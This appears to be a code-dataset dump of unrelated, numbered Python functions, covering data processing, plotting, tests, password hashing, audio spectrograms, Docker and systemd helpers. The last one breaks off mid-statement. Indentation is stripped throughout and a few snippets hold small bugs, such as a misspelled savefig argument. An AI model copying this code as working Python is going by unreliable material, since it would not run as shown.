# TODO: call np.atleast_3d ?
if len(exposure.shape) < 3:
exposure = np.expand_dims(exposure, 0)
# Put exposure outside offset max to zero
# This might be more generaly dealt with a mask map
exposure[:, offset >= offset_max] = 0
data = exposure.to('m2 s')
return WcsNDMap(ref_geom, data)
| 5,739 |
def test_b64_reference() -> None:
"""Test b64() with test cases from the base64 RFC."""
test_cases = [
(b"", b""),
(b"f", b"Zg"),
(b"fo", b"Zm8"),
(b"foo", b"Zm9v"),
(b"foob", b"Zm9vYg"),
(b"fooba", b"Zm9vYmE"),
(b"foobar", b"Zm9vYmFy"),
]
for test_case in test_cases:
assert b64(test_case[0]) == test_case[1]
assert b64decode(test_case[1]) == test_case[0]
| 5,740 |
def calc_random_piv_error(particle_image_diameter):
"""
Caclulate the random error amplitude which is proportional to the diameter of the displacement correlation peak.
(Westerweel et al., 2009)
"""
c = 0.1
error = c*np.sqrt(2)*particle_image_diameter/np.sqrt(2)
return error
| 5,741 |
def resolve(name, module=None):
"""Resolve ``name`` to a Python object via imports / attribute lookups.
If ``module`` is None, ``name`` must be "absolute" (no leading dots).
If ``module`` is not None, and ``name`` is "relative" (has leading dots),
the object will be found by navigating relative to ``module``.
Returns the object, if found. If not, propagates the error.
"""
name = name.split('.')
if not name[0]:
if module is None:
raise ValueError("relative name without base module")
module = module.split('.')
name.pop(0)
while not name[0]:
module.pop()
name.pop(0)
name = module + name
used = name.pop(0)
found = __import__(used)
for n in name:
used += '.' + n
try:
found = getattr(found, n)
except AttributeError:
__import__(used)
found = getattr(found, n)
return found
| 5,742 |
def fibonacci(n:int) -> int:
"""Return the `n` th Fibonacci number, for positive `n`."""
if 0 <= n <= 1:
return n
n_minus1, n_minus2 = 1,0
result = None
for f in range(n - 1):
result = n_minus2 + n_minus1
n_minus2 = n_minus1
n_minus1 = result
return result
| 5,743 |
def change_level(new_level=''):
"""
Change the level of the console handler
"""
log = logging.getLogger('')
for hndl in log.handlers:
if isinstance(hndl, logging.StreamHandler):
if new_level:
hndl.setLevel(ll[new_level.upper()])
return
| 5,744 |
def event_social_link(transaction):
"""
GET /social-links/1/event
:param transaction:
:return:
"""
with stash['app'].app_context():
social_link = SocialLinkFactory()
db.session.add(social_link)
db.session.commit()
| 5,745 |
def get_budget(product_name, sdate):
"""
Budget for a product, limited to data available at the database
:param product_name:
:param sdate: starting date
:return: pandas series
"""
db = DB('forecast')
table = db.table('budget')
sql = select([table.c.budget]).where(table.c.product_name ==
product_name).order_by(asc('month'))
ans = db.query(sql).fetchall()
ret = []
for row in ans:
ret.append(float(row[0]))
date_index = pd.date_range(start = sdate, periods = len(ret), freq = 'M')
return pd.Series(data = ret, index = date_index)
| 5,746 |
def p_function_call(p):
"""FunctionCall : FunctionName '(' Arguments ')'
"""
p[0] = ast.FunctionCall(p[1], *p[3])
| 5,747 |
def stop(remove):
"""
Stop (and optionally remove, --remove) all containers running in background.
"""
if remove:
cmd='docker-compose down'
else:
cmd='docker-compose stop'
project_root=get_project_root()
os.chdir(project_root)
bash_command("Stopping containers", cmd)
| 5,748 |
def test_cli_size_opt(runner):
"""Test the CLI with size opt."""
resp = runner.invoke(cli.app, ['--size', '125', 'tests/data/sample image.png']) # noqa: E501
assert resp.exit_code == 0
assert resp.output.rstrip() == 'https://nsa40.casimages.com/img/2020/02/17/200217113356178313.png'
| 5,749 |
def _residual_block_basic(filters, kernel_size=3, strides=1, use_bias=False, name='res_basic',
kernel_initializer='he_normal', kernel_regularizer=regulizers.l2(1e-4)):
"""
Return a basic residual layer block.
:param filters: Number of filters.
:param kernel_size: Kernel size.
:param strides: Convolution strides
:param use_bias: Flag to use bias or not in Conv layer.
:param kernel_initializer: Kernel initialisation method name.
:param kernel_regularizer: Kernel regularizer.
:return: Callable layer block
"""
def layer_fn(x):
x_conv1 = _res_conv(
filters=filters, kernel_size=kernel_size, padding='same', strides=strides,
use_relu=True, use_bias=use_bias,
kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer,
name=name + '_cbr_1')(x)
x_residual = _res_conv(
filters=filters, kernel_size=kernel_size, padding='same', strides=1,
use_relu=False, use_bias=use_bias,
kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer,
name=name + '_cbr_2')(x_conv1)
merge = _merge_with_shortcut(kernel_initializer, kernel_regularizer,name=name)(x, x_residual)
merge = Activation('relu')(merge)
return merge
return layer_fn
| 5,750 |
def main(bibtex_path: str):
"""
Entrypoint for migrate.py
:params bibtex_path: The PATH to the BibTex (.bib) file on the local machine.
"""
# Load BibTex file and parse it
bibtex_db = load_bibtex_file(
file_path=bibtex_path)
# Obtain every entry key name
bibtex_keys = bibtex_db.entries_dict.keys()
# For all entires in the BibTex file. Remove or replace the "{", "}", "\\textbar" and "\\&" characters in the title field
for key in bibtex_keys:
bibtex_entry = bibtex_db.entries_dict[key]
print(f"Entry before update: {bibtex_entry}")
# Update title
print(f"Old title: {bibtex_entry['title']}\nUpdating title.")
new_title = bibtex_entry["title"].replace("{", "").replace(
"}", "").replace("\\textbar", "|").replace("\\&", "&")
bibtex_entry["title"] = new_title
print(f"New title: {bibtex_entry['title']}")
try:
# Make sure booktitle doesn't contain "{", "}" characters
new_book_title = bibtex_entry["booktitle"].replace("{", "").replace(
"}", "")
bibtex_entry["booktitle"] = new_book_title
except KeyError:
print(
f"BibTex entry: {bibtex_entry['title']} isn't a book. Continuing...")
continue
# Update the top level dictionary
bibtex_db.entries_dict[key].update(bibtex_entry)
print(f"After update: {bibtex_db.entries_dict[key]}")
# Write out new BibTex file
with open("bibtex.bib", "w", encoding="utf-8") as bibtex_file:
bibtexparser.dump(bibtex_db, bibtex_file)
| 5,751 |
def time_count(start, end):
"""
Definition:
Simple function that prints how many seconds it took to run from the 'start'
variable to the 'end' variable.
Args:
start: Required. Usually a time.time() variable at the beginning of a cell.
end: Required. Usually a time.time() variable at the end of a cell.
Returns:
Prints the difference in time between the 'start' and 'end' variables.
"""
print(f"Time to run cell: {int(end-start)} seconds")
| 5,752 |
def console_script(tmpdir):
"""Python script to use in tests."""
script = tmpdir.join('script.py')
script.write('#!/usr/bin/env python\nprint("foo")')
return script
| 5,753 |
def parse_tpl_file(tpl_file):
""" parse a PEST-style template file to get the parameter names
Args:
tpl_file (`str`): path and name of a template file
Returns:
[`str`] : list of parameter names found in `tpl_file`
Example::
par_names = pyemu.pst_utils.parse_tpl_file("my.tpl")
"""
par_names = set()
with open(tpl_file, "r") as f:
try:
header = f.readline().strip().split()
assert header[0].lower() in [
"ptf",
"jtf",
], "template file error: must start with [ptf,jtf], not:" + str(header[0])
assert (
len(header) == 2
), "template file error: header line must have two entries: " + str(header)
marker = header[1]
assert len(marker) == 1, (
"template file error: marker must be a single character, not:"
+ str(marker)
)
for line in f:
par_line = set(line.lower().strip().split(marker)[1::2])
par_names.update(par_line)
# par_names.extend(par_line)
# for p in par_line:
# if p not in par_names:
# par_names.append(p)
except Exception as e:
raise Exception(
"error processing template file " + tpl_file + " :\n" + str(e)
)
# par_names = [pn.strip().lower() for pn in par_names]
# seen = set()
# seen_add = seen.add
# return [x for x in par_names if not (x in seen or seen_add(x))]
return [p.strip() for p in list(par_names)]
| 5,754 |
def test_setup_slack(db, mocker):
"""
Check that the correct operations are applied to create a channel.
"""
study = StudyFactory()
channel_name = study.kf_id.lower().replace("_", "-")
mock_client = mocker.patch("creator.slack.WebClient")
mock_client().conversations_create.return_value = {
"channel": {"id": "ABC", "name": channel_name}
}
assert study.slack_channel is None
setup_slack(study)
assert study.slack_channel == channel_name
# Channel is created
mock_client().conversations_create.assert_called_with(name=channel_name)
# Topic is set
assert mock_client().conversations_setTopic.call_count == 1
# Message is pinned
assert mock_client().chat_postMessage.call_count == 1
assert mock_client().pins_add.call_count == 1
# Users are invited
assert mock_client().conversations_invite.call_count == 1
| 5,755 |
def es_append_cve_by_query(es_index, q, cve):
"""Appends cve to all IPs in es_index by query"""
es = get_es_object()
es.update_by_query(index=es_index,
body={"script": {"inline": "if (ctx._source.cves == null) {ctx._source.cves = params.cvesparam }"
"else {if(!ctx._source.cves.cves.contains(params.cvesparam.cves) && "
"! ctx._source.cves.cves.equals(params.cvesparam.cves)){ "
"ctx._source.cves.cves.add(params.cvesparam.cves); "
"ctx._source.cves.links.add(params.cvesparam.links)}}", "lang":
"painless", "params": {"cvesparam":
{"links":["https://cve.mitre.org/cgi-bin/cvename.cgi?name=" + cve], "cves": [cve]}}}},
q=q)
| 5,756 |
def _save_downscaled(
item: Item,
image: Image,
ext: str,
target_type: str,
target_width: int,
target_height: int,
) -> Media:
"""Common downscale function."""
if ext != 'jpg':
image = image.convert('RGB')
# TODO - these parameters are only for jpg
kwargs = {
'quality': 80,
'progressive': True,
'optimize': True,
'subsampling': 0,
}
width, height = calculate_size(
original_width=image.width,
original_height=image.height,
target_width=target_width,
target_height=target_height,
)
smaller_image = image.resize((width, height))
return Media(
item_uuid=item.uuid,
created_at=datetime.datetime.now(tz=datetime.timezone.utc),
processed_at=None,
status='init',
type=target_type,
ext='jpg',
content=image_to_bytes(smaller_image, **kwargs),
)
| 5,757 |
def get_single_image_results(pred_boxes, gt_boxes, iou_thr):
"""Calculates number of true_pos, false_pos, false_neg from single batch of boxes.
Args:
gt_boxes (list of list of floats): list of locations of ground truth
objects as [xmin, ymin, xmax, ymax]
pred_boxes (dict): dict of dicts of 'boxes' (formatted like `gt_boxes`)
and 'scores'
iou_thr (float): value of IoU to consider as threshold for a
true prediction.
Returns:
dict: true positives (int), false positives (int), false negatives (int)
"""
all_pred_indices = range(len(pred_boxes))
all_gt_indices = range(len(gt_boxes))
if len(all_pred_indices) == 0:
tp = 0
fp = 0
fn = len(gt_boxes)
return {'true_pos': tp, 'false_pos': fp, 'false_neg': fn}
if len(all_gt_indices) == 0:
tp = 0
fp = len(pred_boxes)
fn = 0
return {'true_pos': tp, 'false_pos': fp, 'false_neg': fn}
gt_idx_thr = []
pred_idx_thr = []
ious = []
for ipb, pred_box in enumerate(pred_boxes):
for igb, gt_box in enumerate(gt_boxes):
iou = calc_iou_individual(pred_box, gt_box)
if iou > iou_thr:
gt_idx_thr.append(igb)
pred_idx_thr.append(ipb)
ious.append(iou)
args_desc = np.argsort(ious)[::-1]
if len(args_desc) == 0:
# No matches
tp = 0
fp = len(pred_boxes)
fn = len(gt_boxes)
else:
gt_match_idx = []
pred_match_idx = []
for idx in args_desc:
gt_idx = gt_idx_thr[idx]
pr_idx = pred_idx_thr[idx]
# If the boxes are unmatched, add them to matches
if (gt_idx not in gt_match_idx) and (pr_idx not in pred_match_idx):
gt_match_idx.append(gt_idx)
pred_match_idx.append(pr_idx)
tp = len(gt_match_idx)
fp = len(pred_boxes) - len(pred_match_idx)
fn = len(gt_boxes) - len(gt_match_idx)
return {'true_pos': tp, 'false_pos': fp, 'false_neg': fn}
| 5,758 |
def get_list(caller_id):
"""
@cmview_user
@response{list(dict)} PublicIP.dict property for each caller's PublicIP
"""
user = User.get(caller_id)
ips = PublicIP.objects.filter(user=user).all()
return [ip.dict for ip in ips]
| 5,759 |
def matrix_zeros(m, n, **options):
""""Get a zeros matrix for a given format."""
format = options.get('format', 'sympy')
dtype = options.get('dtype', 'float64')
spmatrix = options.get('spmatrix', 'csr')
if format == 'sympy':
return zeros(m, n)
elif format == 'numpy':
return _numpy_zeros(m, n, **options)
elif format == 'scipy.sparse':
return _scipy_sparse_zeros(m, n, **options)
raise NotImplementedError('Invaild format: %r' % format)
| 5,760 |
def make_password(password, salt=None):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generate a new random salt. If password is None then
return a concatenation of UNUSABLE_PASSWORD_PREFIX and a random string,
which disallows logins. Additional random string reduces chances of gaining
access to staff or superuser accounts. See ticket #20079 for more info.
"""
if password is None:
return UNUSABLE_PASSWORD_PREFIX + get_random_string(
UNUSABLE_PASSWORD_SUFFIX_LENGTH)
if not isinstance(password, (bytes, str)):
raise TypeError(
'Password must be a string or bytes, got %s.'
% type(password).__qualname__
)
hasher = PBKDF2PasswordHasher()
salt = salt or hasher.salt()
return hasher.encode(password, salt)
| 5,761 |
def get_dialect(
filename: str, filehandle: Optional[TextIO] = None
) -> Type[csv.Dialect]:
"""Try to guess dialect based on file name or contents."""
dialect: Type[csv.Dialect] = csv.excel_tab
file_path = Path(filename)
if file_path.suffix == ".txt":
pass
elif file_path.suffix == ".csv":
if filehandle:
dialect = csv.Sniffer().sniff(filehandle.read(4 * 1024))
filehandle.seek(0)
else:
sys.stderr.write("Error: File does not have the ending csv or txt.\n")
sys.exit(2)
return dialect
| 5,762 |
def load_object(primary_path: str, file_name: Optional[str] = None, module: Optional[str] = "pickle") -> Any:
"""
This is a generic function to load any given
object using different `module`s, e.g. pickle,
dill, and yaml.
Note: See `get_file_path()` for details on how
how to set `primary_path` and `file_name`.
"""
file_path = get_file_path(primary_path, file_name)
logger.info(f"Loading '{file_path}'...")
if os.path.isfile(file_path):
if module == "yaml":
obj = load_yaml(file_path)
else:
obj = load_pickle(file_path, module)
logger.info(f"Successfully loaded '{file_path}'.")
return obj
else:
raise FileNotFoundError(f"Could not find '{file_path}'.")
| 5,763 |
def compute_spectrogram(
audio: Union[Path, Tuple[torch.Tensor, int]],
n_fft: int,
win_length: Optional[int],
hop_length: int,
n_mels: int,
mel: bool,
time_window: Optional[Tuple[int, int]],
**kwargs,
) -> torch.Tensor:
"""
Get the spectrogram of an audio file.
Args:
audio: Path of the audio file or a (waveform, sample_rate) tuple.
n_fft:
win_length:
hop_length:
n_mels:
mel: If true we want melodic spectrograms.
time_window: A tuple of two time values such we get the sliced spectrogram w.r.t. that window.
kwargs:
"""
# See if we have to deal with an audio file or (waveform, sample rate).
if isinstance(audio, Path):
waveform, sample_rate = torchaudio.load(audio, format="ogg")
elif isinstance(audio[0], torch.Tensor) and isinstance(audio[1], int):
waveform = audio[0]
sample_rate = audio[1]
else:
raise Exception(
"Input audio worng, it must be either a path to an audio file or a (waveform, sample rate) tuple."
)
spectrogram: Callable
if not mel:
spectrogram = T.Spectrogram(
n_fft=n_fft,
win_length=win_length,
hop_length=hop_length,
center=True,
pad_mode="reflect",
power=2.0,
)
else:
# Mel Spectrogram transform.
spectrogram = T.MelSpectrogram(
sample_rate=sample_rate,
n_fft=n_fft,
win_length=win_length,
hop_length=hop_length,
center=True,
pad_mode="reflect",
power=2.0,
norm="slaney",
onesided=True,
n_mels=n_mels,
mel_scale="htk",
)
if time_window:
# We convert the time window from seconds to frames.
start, end = np.asarray(time_window) * sample_rate
waveform = waveform[:, start:end]
return spectrogram(waveform)
| 5,764 |
def decode_html_dir(new):
""" konvertiert bestimmte Spalte in HTML-Entities """
def decode(key):
return decode_html(unicode(new[key]))
if new.has_key('title') and new['title'].find('&') >= 0:
new['title'] = decode('title')
if new.has_key('sub_title') and new['sub_title'].find('&') >= 0:
new['sub_title'] = decode('sub_title')
if new.has_key('text') and new['text'].find('&') >= 0:
new['text'] = decode('text')
if new.has_key('text_more') and new['text_more'].find('&') >= 0:
new['text_more'] = decode('text_more')
if new.has_key('sections') and new['sections'].find('&') >= 0:
new['sections'] = decode('sections')
if new.has_key('section') and new['section'].find('&') >= 0:
new['section'] = decode('section')
if new.has_key('anti_spam_question'):
new['anti_spam_question'] = decode('anti_spam_question')
return new
| 5,765 |
def apply_hash(h, key):
"""
Apply a hash function to the key.
This function is a wrapper for xxhash functions with initialized seeds.
Currently assume h is a xxhash.x32 object with initialized seed
If we change choice of hash function later, it will be easier to change
how we apply the hash (either through a function or an object) in this method
Parameters
----------
h : hash function to apply
key : key to hash
Returns
-------
val : int
The hash value of the hashed key.
"""
h.update(key)
val = h.intdigest() # TODO: What representation to return? (hex in str format?)
h.reset()
return val
| 5,766 |
def test_experiment_mnist_custom(experiment_files_fixture):
"""
Test of a MIA on the MNIST dataset with custom model for the MNIST
model, custom mode for the MIA model and custom optimizer options
"""
experiment(academic_dataset = 'mnist',
target_model_path = target_path.as_posix(),
mia_model_path = mia_path.as_posix(),
custom_target_model = OrderedDict([
('conv1' , nn.Conv2d(1, 10, 3, 1)),
('relu1' , nn.ReLU()),
('maxpool1' , nn.MaxPool2d(2, 2)),
('conv2' , nn.Conv2d(10, 10, 3, 1)),
('relu2' , nn.ReLU()),
('maxpool2' , nn.MaxPool2d(2, 2)),
('to1d' , Flatten()),
('dense1' , nn.Linear(5*5*10, 500)),
('tanh' , nn.Tanh()),
('dense2' , nn.Linear(500, 10)),
('logsoftmax' , nn.LogSoftmax(dim=1))
]),
custom_target_optim_args = {'lr' : 0.02, 'momentum' : 0.3},
custom_mia_model = OrderedDict([
('dense1' , nn.Linear(20, 50)),
('tanh' , nn.Tanh()),
('dense2' , nn.Linear(50, 2)),
('logsoftmax' , nn.LogSoftmax(dim=1))
]),
custom_mia_optim_args = {'lr' : 0.02, 'momentum' : 0.3},
shadow_number = 50,
custom_shadow_model = OrderedDict([
('conv1' , nn.Conv2d(1, 15, 7, 1)),
('relu1' , nn.ReLU()),
('maxpool1' , nn.MaxPool2d(2, 2)),
('conv2' , nn.Conv2d(15, 25, 7, 1)),
('relu2' , nn.ReLU()),
('maxpool2' , nn.MaxPool2d(2, 2)),
('to1d' , Flatten()),
('dense1' , nn.Linear(2*2*25, 50)),
('tanh' , nn.Tanh()),
('dense2' , nn.Linear(50, 10)),
('logsoftmax' , nn.LogSoftmax(dim=1))
]),
custom_shadow_optim_args = {'lr' : 0.02, 'momentum' : 0.3},
shadow_model_base_path = shadow_base_path.as_posix(),
mia_train_ds_path = mia_train_ds_path.as_posix(),
mia_test_ds_path = mia_test_ds_path.as_posix(),
class_number = 10)
assert target_path.exists()
assert mia_path.exists()
remove_experiment_files()
| 5,767 |
def dmsp_enz_deg(
c,
t,
alpha,
vmax,
vmax_32,
kappa_32,
k
):
"""
Function that computes dD32_dt and dD34_dt of DMSP
Parameters
----------
c: float.
Concentration of DMSP in nM.
t: int
Integration time in min.
alpha: float.
Alpha for cleavage by DddP from this study.
vmax: float.
Vmax for cleavage by DddP, calculated from the K M that the enzyme should have to
exhibit the pattern of d34S DMSP vs. time, in nM/min/nM enzyme
Vmax_d: float.
km: float.
K M that the enzyme should have to exhibit the pattern of d34S DMSP vs. time, in nM.
k: float.
Degradation rate of the enzyme, in min^-1.
Returns
-------
The dD32_dt and dD34_dt of DMSP
"""
# Unpack isotopes
enzyme, dmsp_34, dmsp_32 = c
#Calculate vmax_34 assuming that Vmax total = Vmax_32 + Vmax_34
#This assumption would only hold true at saturation
vmax_34 = vmax-vmax_32
#Determination of kappa 32 from kappa 34 and the fractionation factor
kappa_34 = kappa_32 * alpha
# Calculate dD34_dt
dD34_dt = - ((kappa_34 * enzyme * (vmax_34 * enzyme * dmsp_34/((vmax_34 * enzyme)+(kappa_34 * enzyme * dmsp_34)))))
# Calculate dD32_dt
dD32_dt = - ((kappa_32 * enzyme * (vmax_32 * enzyme * dmsp_32/((vmax_32 * enzyme)+(kappa_32 * enzyme * dmsp_32)))))
#Calculate dE_dt
dE_dt = -k*enzyme
return [dE_dt, dD34_dt, dD32_dt]
| 5,768 |
def debug(msg):
"""If program was run with -d argument, send parm string to stdout."""
if DEBUG_ENABLED:
print("Debug: {}".format(msg))
| 5,769 |
def plot_holdings(returns, positions, legend_loc='best', ax=None, **kwargs):
"""Plots total amount of stocks with an active position, either short
or long.
Displays daily total, daily average per month, and all-time daily
average.
Parameters
----------
returns : pd.Series
Daily returns of the strategy, noncumulative.
- See full explanation in tears.create_full_tear_sheet.
positions : pd.DataFrame, optional
Daily net position values.
- See full explanation in tears.create_full_tear_sheet.
legend_loc : matplotlib.loc, optional
The location of the legend on the plot.
ax : matplotlib.Axes, optional
Axes upon which to plot.
**kwargs, optional
Passed to plotting function.
Returns
-------
ax : matplotlib.Axes
The axes that were plotted on.
"""
if ax is None:
ax = plt.gca()
positions = positions.copy().drop('cash', axis='columns')
df_holdings = positions.apply(lambda x: np.sum(x != 0), axis='columns')
df_holdings_by_month = df_holdings.resample('1M', how='mean')
df_holdings.plot(color='steelblue', alpha=0.6, lw=0.5, ax=ax, **kwargs)
df_holdings_by_month.plot(
color='orangered',
alpha=0.5,
lw=2,
ax=ax,
**kwargs)
ax.axhline(
df_holdings.values.mean(),
color='steelblue',
ls='--',
lw=3,
alpha=1.0)
ax.set_xlim((returns.index[0], returns.index[-1]))
ax.legend(['Daily holdings',
'Average daily holdings, by month',
'Average daily holdings, net'],
loc=legend_loc)
ax.set_title('Holdings per Day')
ax.set_ylabel('Amount of holdings per day')
ax.set_xlabel('')
return ax
| 5,770 |
def get_systemd_run_args(available_memory):
"""
Figure out if we're on system with cgroups v2, or not, and return
appropriate systemd-run args.
If we don't have v2, we'll need to be root, unfortunately.
"""
args = [
"systemd-run",
"--uid",
str(os.geteuid()),
"--gid",
str(os.getegid()),
"-p",
f"MemoryLimit={available_memory // 2}B",
]
try:
check_call(args + ["--user", "printf", "hello"])
args += ["--user", "--scope"]
except CalledProcessError:
# cgroups v1 doesn't do --user :(
args = ["sudo", "--preserve-env=PATH"] + args + ["-t", "--same-dir"]
return args
| 5,771 |
def distribution_plot(x1, x2=None, x3=None, x4=None, label1='train',
label2='back_test', label3=None, label4 = None,
title=None, xlabel=None, ylabel=None, figsize=(12, 3)):
"""
:param x1: pd series or np array with shape (n1,)
:param x2: pd series or np array with shape (n2,)
:param x3: pd series or np array with shape (n3,)
:param x4: pd series or np array with shape (n3,)
:param label1:
:param label2:
:param title:
:param xlabel:
:param ylabel:
:param figsize:
:return:
"""
fig, ax = plt.subplots(figsize=figsize)
sns.kdeplot(x1, shade=True, color=color[0], label=label1, alpha=.6, ax=ax)
if x2 is not None:
sns.kdeplot(x2, shade=True, color=color[1], label=label2, alpha=.4, ax=ax)
if label3 is None:
label3 = label2
if x3 is not None:
sns.kdeplot(x3, shade=True, color=color[2], label=label3, alpha=.4, ax=ax)
if label4 is None:
label4 = label3
if x4 is not None:
sns.kdeplot(x4, shade=True, color=color[3], label=label4, alpha=.4, ax=ax)
if title is not None:
plt.title(title, fontsize=16)
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
plt.savefig(PATH + 'phân bố ', bbox_inches='tight', bpi=1200)
plt.show()
| 5,772 |
def concatenation_sum(n: int) -> int:
"""
Algo:
1. Find length of num (n), i.e. number of digits 'd'.
2. Determine largest number with 'd - 1' digits => L = 10^(d - 1) - 1
3. Find diff => f = n - L
4. Now, the sum => s1 = f * d, gives us the number of digits in the string formed by all 'd'-digit numbers
less than or equal to 'n'.
5. Now, iteratively calculate and sum ((10^(d-i) - 10^(d-i-1)) * (d-i)) for i ∈ [1, d)
6. This will determine the number of digits in the string formed by all 'd-1', 'd-2', and so on -digits numbers.
:param n: Max number
:return: Number of digits in the string, formed by concatenating all the numbers from 1 to n.
"""
d = len(str(n))
L = 10**(d - 1) - 1
f = n - L
s1 = f * d
s2 = get_numdigs_sum_upto(d - 1)
return s1 + s2
| 5,773 |
def customize_compiler_gcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
the OO route, I have this. Note, it's kindof like a wierd functional
subclassing going on."""
# tell the compiler it can processes .cu
self.src_extensions.append('.cu')
# save references to the default compiler_so and _comple methods
default_compiler_so = self.compiler_so
super = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
postargs = extra_postargs['gcc']
super(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
| 5,774 |
def make_join_conditional(key_columns: KeyColumns, left_alias: str, right_alias: str) -> Composed:
"""
Turn a pair of aliases and a list of key columns into a SQL safe string containing
join conditionals ANDed together.
s.id1 is not distinct from d.id1 and s.id2 is not distinct from d.id2
"""
composed_aliases = {"left_alias": Identifier(left_alias), "right_alias": Identifier(right_alias)}
template = "{left_alias}.{column} {equality} {right_alias}.{column}"
composed_conditionals = [
SQL(template).format(
column=Identifier(c.name),
equality=SQL("=" if c.not_nullable else "is not distinct from"),
**composed_aliases,
)
for c in key_columns
]
return SQL(" and ").join(composed_conditionals)
| 5,775 |
def home():
""" Home interface """
return '''<!doctype html>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<body style="margin:0;font-family:sans-serif;color:white">
<form method="POST" action="analyse" enctype="multipart/form-data">
<label style="text-align:center;position:fixed;top:0;bottom:0;width:100%;background-position:center;background-size:cover;background-image:url(https://blog.even3.com.br/wp-content/uploads/2019/04/saiba-como-e-por-que-fazer-crachas-para-eventos-1.png)">
<br /><br />
<h1>Cara-crachá</h1>
<h3 id="processing" style="display:none">Processando...</h3>
<input type="file" name="file" onchange="processing.style.display='block';this.form.submit()" style="display:none" />
</label>
</form>
</body>
'''
| 5,776 |
def step_use_log_record_configuration(context):
"""
Define log record configuration parameters.
.. code-block: gherkin
Given I use the log record configuration:
| property | value |
| format | |
| datefmt | |
"""
assert context.table, "REQUIRE: context.table"
context.table.require_columns(["property", "value"])
for row in context.table.rows:
property_name = row["property"]
value = row["value"]
if property_name == "format":
context.log_record_format = value
elif property_name == "datefmt":
context.log_record_datefmt = value
else:
raise KeyError("Unknown property=%s" % property_name)
| 5,777 |
def _enable_mixed_precision_graph_rewrite_base(opt, loss_scale,
use_v1_behavior):
"""Enables mixed precision. See `enable_mixed_precision_graph_rewrite`."""
opt = _wrap_optimizer(opt, loss_scale, use_v1_behavior=use_v1_behavior)
config.set_optimizer_experimental_options({'auto_mixed_precision': True})
return opt
| 5,778 |
def get_args() -> ProgramArgs:
"""
utility method that handles the argument parsing via argparse
:return: the result of using argparse to parse the command line arguments
"""
parser = argparse.ArgumentParser(
description="simple assembler/compiler for making it easier to write SHENZHEN.IO programs"
)
parser.add_argument(
'input', type=argparse.FileType(),
help="the input file to ingest"
)
parser.add_argument(
'-o', '--output',
help='the output file path', default='out.asm'
)
parser.add_argument(
'-c', '--chip', choices=shenasm.chips.list_names(), default=shenasm.chips.CHIP_TYPE_MC6000,
help='inform assembler of target chip for better diagnostics'
)
parser.add_argument(
'-v', '--verbose', action='store_true',
help='flag to cause more verbose output during execution'
)
parser.add_argument(
'--dotfile', type=str, default=None,
help='write a graphviz compatible .dot file containing the intermediate representation graph of the input'
)
return parser.parse_args()
| 5,779 |
def selection_criteria_1(users, label_of_interest):
"""
Formula for Retirement/Selection score:
x = sum_i=1_to_n (r_i) — sum_j=1_to_m (r_j).
Where first summation contains reliability scores of users who have labeled it as the same
as the label of interest, second summation contains reliability scores of users who have
labeled it differently
Args:
users (list): List of users where each element is a tuple of the form (uid, ulabel,
f1 score)
label_of_interest (int): Label under consideration (left hand summation of formula)
Returns (int): 1 = select the subject id, 0 = don't select
"""
left_sum, right_sum = 0, 0
threshold = 2.0
for user in users:
uid, ulabel, f1_score = user
if ulabel == label_of_interest:
left_sum += f1_score
else:
right_sum += f1_score
if left_sum - right_sum >= threshold:
return 1
else:
return 0
| 5,780 |
def get_default_product_not_found(product_category_id: str) -> str:
"""Get default product.
When invalid options are provided, the defualt product is returned. Which happens to be unflavoured whey at 2.2 lbs.
This is PRODUCT_INFORMATION.
"""
response = requests.get(f'https://us.myprotein.com/{product_category_id}.variations')
response.raise_for_status()
dom = bs4.BeautifulSoup(response.text, 'html.parser')
# data-child-id is the attribute that contains the canonical product id
product_id_node = dom.find(attrs={'data-child-id': True})
if not product_id_node:
err_msg = f'Could not get data to resolve options to product id. Url: {response.url}'
raise ValueError(err_msg)
return cast(str, product_id_node['data-child-id'])
| 5,781 |
def tscheme_pendown():
"""Lower the pen, so that the turtle starts drawing."""
_tscheme_prep()
turtle.pendown()
| 5,782 |
def book_number_from_path(book_path: str) -> float:
"""
Parses the book number from a directory string.
Novellas will have a floating point value like "1.1" which indicates that it was the first novella
to be published between book 1 and book 2.
:param book_path: path of the currently parsed book
:return: book number
"""
num = int(re.findall(r'[0-9]{2}', book_path)[-1])
return num / 10
| 5,783 |
def intervals_split_merge(list_lab_intervals):
"""
对界限列表进行融合
e.g.
如['(2,5]', '(5,7]'], 融合后输出为 '(2,7]'
Parameters:
----------
list_lab_intervals: list, 界限区间字符串列表
Returns:
-------
label_merge: 合并后的区间
"""
list_labels = []
# 遍历每个区间, 取得左值右值字符串组成列表
for lab in list_lab_intervals:
for s in lab.split(','):
list_labels.append(s.replace('(', '').replace(')', '').replace(']', ''))
list_lab_vals = [float(lab) for lab in list_labels]
# 取得最大最小值的索引
id_max_val = list_lab_vals.index(max(list_lab_vals))
id_min_val = list_lab_vals.index(min(list_lab_vals))
# 取得最大最小值的字符串
lab_max_interval = list_labels[id_max_val]
lab_min_interval = list_labels[id_min_val]
# 如果右边界限的值为+Inf,则改为')', 其他为']'
l_label = '('
if lab_max_interval == '+Inf':
r_label = ')'
else:
r_label = ']'
label_merge = l_label + lab_min_interval + ',' + lab_max_interval + r_label
return label_merge
| 5,784 |
def antique(bins, bin_method=BinMethod.category):
"""CARTOColors Antique qualitative scheme"""
return scheme('Antique', bins, bin_method)
| 5,785 |
def RegisterApiCallRouters():
"""Registers all API call routers."""
# keep-sorted start
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRobotRouter", api_call_robot_router.ApiCallRobotRouter)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterStub", api_call_router.ApiCallRouterStub)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithApprovalChecks",
api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks)
api_call_router_registry.RegisterApiCallRouter(
